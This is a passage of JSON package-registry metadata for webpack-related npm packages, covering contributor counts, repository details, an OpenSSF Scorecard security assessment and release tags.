s.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-egoist/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-egoist/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-egoist/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-egoist/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-egoist/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-egoist/codemeta","maintainers":[{"uuid":"rem","login":"rem","name":null,"email":"0x142857@gmail.com","url":null,"packages_count":492,"html_url":"https://www.npmjs.com/~rem","role":null,"created_at":"2022-11-15T10:39:51.339Z","updated_at":"2022-11-15T10:39:51.339Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/rem/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":14049540,"name":"@depup/webpack","ecosystem":"npm","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff. (with updated d","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":["webpack","depup","updated-dependencies","security","latest","patched"],"namespace":"depup","versions_count":6,"first_release_published_at":"2026-03-14T21:05:43.982Z","latest_release_published_at":"2026-08-30T01:01:37.224Z","latest_release_number":"5.110.1-depup.0","last_synced_at":"2026-09-03T00:19:03.460Z","created_at":"2026-03-14T21:10:21.907Z","updated_at":"2026-09-03T00:19:03.460Z","registry_url":"https://www.npmjs.com/package/@depup/webpack","install_command":"npm install @depup/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.110.1-depup.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.1